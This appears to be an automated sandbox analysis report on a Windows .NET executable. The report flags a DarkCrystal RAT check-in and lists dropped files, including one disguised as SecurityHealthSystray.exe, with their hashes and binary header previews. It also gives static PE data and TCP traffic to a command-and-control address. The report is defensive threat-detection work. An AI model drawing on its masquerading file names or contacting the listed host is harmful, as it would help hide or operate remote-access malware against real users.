                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                              C:\Users\user\Desktop\nocldQFM.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):32256
                                                                                              Entropy (8bit):5.631194486392901
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\xWYkXXxo.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):32256
                                                                                              Entropy (8bit):5.631194486392901
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):55
                                                                                              Entropy (8bit):4.306461250274409
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                              Malicious:false
                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                              C:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):1224
                                                                                              Entropy (8bit):4.435108676655666
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                              Malicious:false
                                                                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                              C:\Windows\System32\SecurityHealthSystray.exe

                                                                                              Download File
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):4608
                                                                                              Entropy (8bit):3.960657647523148
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:6XJbPtPaM7Jt8Bs3FJsdcV4MKe27jdFvqBH+OulajfqXSfbNtm:yPpHPc+Vx9MnvkYcjRzNt
                                                                                              MD5:87D4C15041E2AD3B86C8CFA6FAE46E3C
                                                                                              SHA1:3E52C4643B3116CEA5B95752BE4B4D91BDF28FA6
                                                                                              SHA-256:96E13A3E4F90AFBC8D869B388D50894D4693327DEA6219019A1C46745E826002
                                                                                              SHA-512:22E17E05B0BF7316AFE922AD1E8180B9A633CB8A6F1F203DF802EB6598E26BCFF2D7D1E51D4DA6B83FF810D1EA8B1BDB5FAB8B099850744C973E8EC7B8072CB7
                                                                                              Malicious:true
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... Wg.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                              \Device\Null

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\PING.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):502
                                                                                              Entropy (8bit):4.615650117503229
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:Ph5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:jdUOAokItULVDv
                                                                                              MD5:5FF667EE42675323399ED42D1D4E7D67
                                                                                              SHA1:D1270CCACF1852B1E94B65149EFB1C04EEBCE147
                                                                                              SHA-256:4FE52988323AFB1C290332B8EBED35A13166D46F80168D3C8F9F0E6A5874BECD
                                                                                              SHA-512:C8AFC2892F0D5B221437D0179FDF811E9459FD762E77CB2B72BA93B950113A8061889FA4C262F8A78487B8E58604BC64663DD78D4C82B862B82E446873A1B1C3
                                                                                              Malicious:false
                                                                                              Preview:..Pinging 932923 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              File name:4si9noTBNw.exe
                                                                                              File size:1'920'000 bytes
                                                                                              MD5:68ef473852d3aefd8e5e4f2e00b3dfaa
                                                                                              SHA1:3ba2594ec459d1c9152558ebdd9611427347a73e
                                                                                              SHA256:f28d2482802e94cd02376a7153b318ef4facc86cfc804ae117419c520520f8ec
                                                                                              SHA512:8602717380a4ad4ca7cbcdbb2373e63ff8578d58e6324d43530b134c6d7005469ff89c45bad773da978d4263a56c51efd331b09790f5708a563f26a513cad3ff
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              TLSH:2D959E06B6924E32C364573586AB513D4290C72A7A52FF1F391F21D2A91FBF18B721B3
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:90cececece8e8eb0

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x5d631e
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67395757 [Sun Nov 17 02:39:19 2024 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              jmp dword ptr [00402000h]
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al
                                                                                              add byte ptr [eax], al

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1d62d00x4b.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d80000x320.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1da0000xc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x20000x1d43240x1d44006750efa2fe1839c200a1361e393decdbFalse0.7786409670315003data7.53942476676294IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x1d80000x3200x400fefc90889af2a301686a704f2c7112cdFalse0.3525390625data2.651038093332615IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .reloc0x1da0000xc0x200e821884ebb4ee3ac1cb10f417b1d2d33False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_VERSION0x1d80580x2c8data0.46207865168539325

                                                                                              Imports

                                                                                              DLLImport
                                                                                              mscoree.dll_CorExeMain

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-09T16:00:32.875792+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973637.44.238.25080TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 9, 2024 16:00:31.403799057 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:31.523168087 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:31.523241997 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:31.523606062 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:31.643734932 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:31.876008034 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:31.995610952 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:32.795283079 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:32.875606060 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:32.875722885 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:32.875792027 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:32.915924072 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.035296917 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.220446110 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.265873909 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.329189062 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.340545893 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.342761040 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.342895031 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.385328054 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.422000885 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.463747025 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.688447952 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.766499996 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.807980061 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:33.812653065 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.869049072 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:33.988394976 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.219031096 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:34.274930954 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.340173006 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.340327024 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.422012091 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:34.624191046 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.727336884 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.797005892 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:34.858685970 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:34.922055960 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:34.987003088 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.391999960 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.392899990 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.397429943 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.512329102 CET804973837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:35.512408018 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.512550116 CET804973637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:35.512603998 CET4973680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.512751102 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.517429113 CET804973737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:35.517494917 CET4973780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.632100105 CET804973837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:35.872297049 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:35.992079973 CET804973837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.379184008 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.390875101 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.498611927 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.498709917 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.498913050 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.510740995 CET804973837.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.510792017 CET4973880192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.544984102 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.618165016 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.664398909 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.664484024 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.664628029 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.783871889 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.844135046 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.963665009 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963680029 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963699102 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963706970 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963741064 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.963754892 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963764906 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963797092 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963803053 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.963859081 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963867903 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.963917971 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:36.963958025 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:36.966630936 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.015894890 CET4974280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.083753109 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.083782911 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.083791971 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.083800077 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.083858967 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.083873034 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.083904982 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.083914042 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.127130985 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.128724098 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.135272026 CET804974237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.247376919 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.251404047 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.291253090 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.294848919 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.414351940 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.455351114 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.455413103 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.483129978 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.483306885 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.483400106 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.575740099 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.575820923 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.603751898 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.603766918 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.603807926 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.603817940 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.603813887 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.603840113 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.603858948 CET4974180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:00:37.604218960 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604228973 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604239941 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604326010 CET804974137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:00:37.604336023 CET804974137.44.238.250192.168.2.4
